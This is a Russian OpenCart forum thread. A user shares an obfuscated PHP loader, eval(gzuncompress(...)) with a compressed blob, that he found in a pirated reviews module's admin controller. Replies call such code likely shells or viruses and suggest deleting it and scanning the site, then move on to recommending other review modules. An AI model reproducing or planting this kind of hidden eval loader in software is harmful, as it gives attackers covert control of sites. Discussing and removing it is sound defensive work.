COVID2019 и это вот все. Друзья, вся эта история начинает плохо пахнет. Мойте руки, не ходите в люди. Отложите все плановые покупки и положите в носок заначку. Заприте ваших родителей, бабушек-дедушек на даче. Лучше перебдеть чем недобдеть. Берегите себя!

Помогите расшифровать


Adems

Recommended Posts

Здравствуйте! Помогите расшифровать, если кому не лень, у меня не выходит:

Скрытый текст

<?php eval(gzuncompress("xЪн[[oг¶ю+¬lАN¶o'µЃb›ў§M»О>Ѓ Kt¬®LъђTТ4Эя^ЮDQIQNљm_6ksж\x1bО\x0c/ГЏt^e„L> H1Є*Ђ?d4«РЭz‡3ZВ»\x09ш•X2O\x5cЮgњЊ^fgЏУЩЕЎЮTe>ЩЦ0§%‚“аЧймйґ„„ЃV XћТ]I«Бmy·XЭ:M3•ba+Х’Ймвґ`]№IЪЇn—-ТE№ќћґ™‰Њ9 H\x00я_QbђУ©j©qµXU%ь<Mrйг№aщ\x5cA%у„ўП\x00.“3ҐG\x00!М›ЕJvGґ&·уdЅю_2›]|iа¬°(ЁПК\x0aцoпкм8m&Zё@yЅђrkфє¤hzЭ\x00ЁXн@Vр8Q.“МО’Ї7xrѕъб\x09‚Хгd1©РЂЂћmКЯ\x5cшYQ¬й#ГOоKрpNшяЙ\x00Є;ОrBЛЏ=*@5аDG’щ!ВЄю2)–°©NТяk@„·ша›дгеПџ.ЧЧй—ЧЯ_}ЛЅL~єZ_'іwп”К}V•2Аі'†TЬѓ; Bo:гI5Ґ,·ґ&Йm\x0b8Bйdщ^Џ/б^ЄвђZ‹Eи®—ч,ОУЇША\x00#ХЮ·гIjЁр5+6ЁйZ~иМњdотKзЖД¤Оsц\x0dџQОaFЩњol’ґ‘ЦhЗNІс“ЛNµXpn’‡\x0cCЋwЛFѓZ&DKЄ\x1b–…&-nҐ\x24й›ф…®5Э‹¦Oеў†1АЭ>¶ијwкЛMM)‚)ЙоЃ7‰¦Њ^MХ—ysP\x0d©*)­,†ЂЩF­Жю±УuU‹’Dиj)·r\x0a›ђЖЎґвЋ}АЏzv{@:B–*џ›|ҐPЦbхґ\x00\x24ЏДђІPVУВеoЃ€цЅ1Ѕ±Ґ-°;„Љt“\x0dхF‹Щ©чы\x0c?ҐDIЩКЖ23\x00РЭј< 1би‰Ыp%K\x5c\x5cџ\x0cI?HTџlq\x0bміІАђ2–bЋкАњ3e,E6ЛнPV•ђҐЪмДј?qЦҐб%хж¶uE6ТнўДч*’VЩ&°ђv„lХ`6M­H(В …ЩЮїф\x22µ”пНєRNд5kЪ6Э•ТКr0’°йЋP«\x0aци¤8ҐЏїq‡ЁЩ@ТM…тПЄrtГ’lѓШ”C18Na\x0d•Aт В”тНК\x0bУґ \x0bїР*EhЗ*:ыT0НЦШbk ?\x0cј±-ЌнЂCы}h‹oЪµЯSјТў±-Ѓ\x1bTgWЪ`vЪКqЅЯрU§9еєoљfQ{\x24ЛU 0Щ!ѕyІГ`ЫJљ…3у\x0dБу\x22#»\x0dКp1єjn†€8…·®ѕhm®e’†Б\x1bp„sVДФlьiaЗ‚z«яАq^‰gR­%р3rґI©хQ*g«Љ3ёµXXжjщ>2Вl(УОТ™2ѓСЦ\x0dЅЈ.WяЦdајМfТ7U%№)2µ R№мE#Io¤ТФЪп”K‘P„О5W™є9¶d;–рiyЋ0+м{ЉщmЯґ\x09ђљўўWь‹µR}ЮBeСLЎЕкNщ#шН㴇oGл2И:kАјњҐОб—ЋЁ2Ьн‡UЈГ(/эЎОЄТ>Жм†?t! щЎЕґж\x24боѕ}О€\x00т»`ѓyѓЎ._ћCK:ІҐ–гЃэъАЅЋZ\x0aG:Ьњ№<¶Џfc ҐПsЎwґУдpјКЙ2IЖ№Џ‘<\x0dNё„t;\x0dћЭЈqcdѕЈы*eµtIЩi3g\x1bН40oeс?їьс:эщУХхеzћ|єюnс'[\x1b‘5yь\x09Џ†о)tф8ђ'¬шA еG@·ы‘ЁГ№ы\x09o`GдH1>одXtР0ЊЯ#\x0bК\x1bЎ†]гCKХєЭиS№Q`~gъЂ^\x0c~xЊKљ&хA6‹(ѓl8¤‰Щ1Ю¶Ы!Л\x09иwЛкх¬CџЏJ•IJ{Тев­c!isБъSЧЎДGyhRЬ],x,dАC¬ЯГБ>ЖГцRГн^яТ#\x0aМпXРл•q“ТЬ\x0cvЏnѕэБ:а]К\x00\x1bZвшљл‡љњR‚_WХ{V`K#ґMi\x0d±E€FЩV‚ЋЫh–Р«љjќV‰БйзIхЊЄd.мутЕ~їТР*S}ыя\x0aЏ:RAНЮФУЌSAI•EoЂіоkжҐдѓъХy47\x5c‚ё\x0caаq‡KX–mьQИ\x0cЄЉФРf6~я=Rтd9ўзпD¤м·<<M>ж#,°“v¬Ќ’\x5coН(КЁ!Э5dЩ…’ј”Ґљвпз’|ЏP‘\x0cю\x5cPрвbЃњ·у\x24а›8’б\x0bоYЏeФMН‹=•Нйћ%пфDдІЌ§н;5“'ЗЏкёYlkrЫPҐcW ™Т†Бх`«€CдђяѕzKп‡ћср¦іґпђУоUfМ»з‹ђЗ\x1bОg\x1bMЕ\x09`·–rvVIWхЬпT”\x22ls/wх– \x0dQГhSФнЖАі—мЫєЛµWзm№1R‹2р0„7ю3o‰_x[ЉёE~Б«jу\x22yФ\x0dзq—ЙюЪR”НтR\x5c”НнVрц/л^ЄЈкњcЊ€1Э~щтИЬ2_=\x0bз#ЬР㦕х¬їiЦЋЌВ38еш?”(Ю°%r‘ґ№’ ырrlБй/БeмW>’р3\x0bjUЕЌЫK”ЧeьI/&ж“ 7™NWяьИ/lюўИђ‡’ж;ЏЇMY4{К3&кЌTтЯиЃ&дЫ7AS?ЎС„B.FЈcЛЧфПІ—ЄP‰оҐ”мҐкбQ©7»'ЗX|ч¤ь+tпKЂЄЯЋ›ГiФXжхИѓ©ЌЭэУКе*щК`_пЧ\x5cvЊ›ЯLѕh€х1ыжаџ“Tч/Nлы±iнјС-·e.Ю‘Yщѓ`гоD/ґ‚co,і•z±Ъeд'ЂчҐЂњ&Вт#ійЊїN•НДщз‚’;h|uЫwbўМћ0 5†Љk JхН6cшzpсh\x22("));

 

Изменено пользователем RHCk
Убирайте подобное под спойлер!
Ссылка на комментарий
Поделиться на других сайтах

4 часа назад, Adems сказал:

Здравствуйте! Помогите расшифровать, если кому не лень, у меня не выходит:

  Скрыть содержимое

 

 

откуда это? 

Ссылка на комментарий
Поделиться на других сайтах

59 минут назад, Blondy сказал:

откуда это? 

Поставил себе модуль отзывы о магазине от сюда --Тут была плохая ссылка--

Нашел это в контроллере админки, написал им просьбу объясниться, меня заблокировали.

Аж интересно что они там спрятали.

Пока этот файл удалил.

Ссылка на комментарий
Поделиться на других сайтах

Потому что не надо брать модули с непроверенных сайтов. 

Удаляйте, это для начала. 

Я бы еще советовала хотябы айболитом пройтись. И ради интереса - сбросьте мне, пожалуйста, файлы модуля, гляну, что там. Интересно

Ссылка на комментарий
Поделиться на других сайтах

1 минуту назад, Blondy сказал:

Потому что не надо брать модули с непроверенных сайтов. 

Удаляйте, это для начала. 

Я бы еще советовала хотябы айболитом пройтись. И ради интереса - сбросьте мне, пожалуйста, файлы модуля, гляну, что там. Интересно

Написал комент удалили сразу уроды.

Можно ссылку на айболит?

Ссылка на комментарий
Поделиться на других сайтах

1 минуту назад, Adems сказал:

Написал комент удалили сразу уроды.

Можно ссылку на айболит?

 

https://www.revisium.com/ai/

 

почту, куда отправить модуль, бросила в личку 

Ссылка на комментарий
Поделиться на других сайтах

3 минуты назад, Blondy сказал:

Потому что не надо брать модули с непроверенных сайтов. 

Удаляйте, это для начала. 

Я бы еще советовала хотябы айболитом пройтись. И ради интереса - сбросьте мне, пожалуйста, файлы модуля, гляну, что там. Интересно

Не подскажите как вам файлы скинуть?

Только что, Adems сказал:

Не подскажите как вам файлы скинуть?

понял

Ссылка на комментарий
Поделиться на других сайтах

Ну и на будущее. Я надеюсь, что скачали вы по незнанию. Если еще увижу, что ставите модули с нехороших сайтов - накажу )

Ссылка на комментарий
Поделиться на других сайтах

Только что, Blondy сказал:

Ну и на будущее. Я надеюсь, что скачали вы по незнанию. Если еще увижу, что ставите модули с нехороших сайтов - накажу )

А так он мне понравился зараза, дак нет простенького модуля с таким функционалом и чтоб почти на халяву))

Может расшифровать да хоть гляну что они напихали там?

Ссылка на комментарий
Поделиться на других сайтах

10 минут назад, Blondy сказал:

Есть хорошие решения - но они не на халяву )) 

Посоветуйте подобное пожалуйста, мне надо отзывы о магазине с отдельной страницей и модулем.

Ссылка на комментарий
Поделиться на других сайтах

5 минут назад, Adems сказал:

Посоветуйте подобное пожалуйста, мне надо отзывы о магазине с отдельной страницей и модулем.

Самые лучшие ?

https://opencartforum.com/files/file/2371-seo-cms-top-2-blog-novosti-otzyvy-galereya-formy/

 

5 минут назад, Adems сказал:

Посоветуйте подобное пожалуйста, мне надо отзывы о магазине с отдельной страницей и модулем.

И на будущее. На пиратских сайтах обычно в модули встраивают шеллы и вирусы
Скорее всего это и было
Лучше покупайте на проверенных площадках и у авторов

Ссылка на комментарий
Поделиться на других сайтах

Только что, markimax сказал:

Спасибо! Да я видел это модуль, вопрос цены и хочется попроще чтоб одни отзывы о магазине.

Ссылка на комментарий
Поделиться на других сайтах

4 минуты назад, Adems сказал:

Спасибо! Да я видел это модуль, вопрос цены и хочется попроще чтоб одни отзывы о магазине.

А отзывы задействуют весь функционал
Вы не забывайте

Ведь отзывы о магазине

Это

1. Отдельная страницы со своим ЧПУ, разметкой и мета тегами
2. Это сам функционал отзывов, с визуальным редактором, аватарами, ответами администратора и показа статус купившего, дополнительные поля
А это серьезный функционал и весь задействован

 

Вот примеры

https://opencartadmin.com/feedback.html

4450984967.png

 

https://oc2.opencartadmin.com/feedback.html

Ссылка на комментарий
Поделиться на других сайтах

Только что, RHCk сказал:

Тема с просьбой облагородить варез превратилась в развёрнутую презентацию модуля от Марка.

Вот она, сила маркетинга. Дайте два))

Ну а что делать... в отзывах о магазине он лучший полнофункциональный вариант, а не обрезки :Koshechka_08:

Ссылка на комментарий
Поделиться на других сайтах

2 минуты назад, RHCk сказал:

Тема с просьбой облагородить варез превратилась в развёрнутую презентацию модуля от Марка.

Вот она, сила маркетинга. Дайте два))

))

Ссылка на комментарий
Поделиться на других сайтах

1 минуту назад, BuslikDrev сказал:

На буржуйском сайте опенкарт есть бесплатный модуль отзывов магазина.

Ссылку не дадите? (если есть)

Ссылка на комментарий
Поделиться на других сайтах

5 минут назад, Adems сказал:

Ссылку не дадите? (если есть)


Перевод сами думаю сделаете.

 

Ссылка на комментарий
Поделиться на других сайтах

3 минуты назад, BuslikDrev сказал:

Спасибо! извиняюсь туплю маленько, я его поставил под 2.1 но там один момент не очень, отзывы подгружаются через аякс (пробовал переделать но сил маловато, не вышло), в плане индексации бесполезен, у меня он стоит пока не нашел подходящий, а вообще нормальный.

Ссылка на комментарий
Поделиться на других сайтах

Только что, Adems сказал:

Спасибо! извиняюсь туплю маленько, я его поставил под 2.1 но там один момент не очень, отзывы подгружаются через аякс, в плане индексации бесполезен, у меня он стоит пока не нашел подходящий, а вообще нормальный.

Ну, не знаю, вроде нормальный - мне лично нравится - при этом это бесплатный вариант, а в платном функционал шире, может и с индексацией норм.

Ссылка на комментарий
Поделиться на других сайтах

Только что, BuslikDrev сказал:

Ну, не знаю, вроде нормальный - мне лично нравится - при этом это бесплатный вариант, а в платном функционал шире, может и с индексацией норм.

Нормальный, не спорю, но страница с отзывами для бота всегда пустая, жаль. Если есть возможность переделать будет отличный простенький модуль. Под версию 2.3 там функционал получше. Ноя пока ни как не созрею на 2.3 перейти.

Ссылка на комментарий
Поделиться на других сайтах

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Гость
Ответить в тему...

×   Вы вставили отформатированное содержимое.   Удалить форматирование

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Сейчас на странице   0 пользователей

    • Нет пользователей, просматривающих эту страницу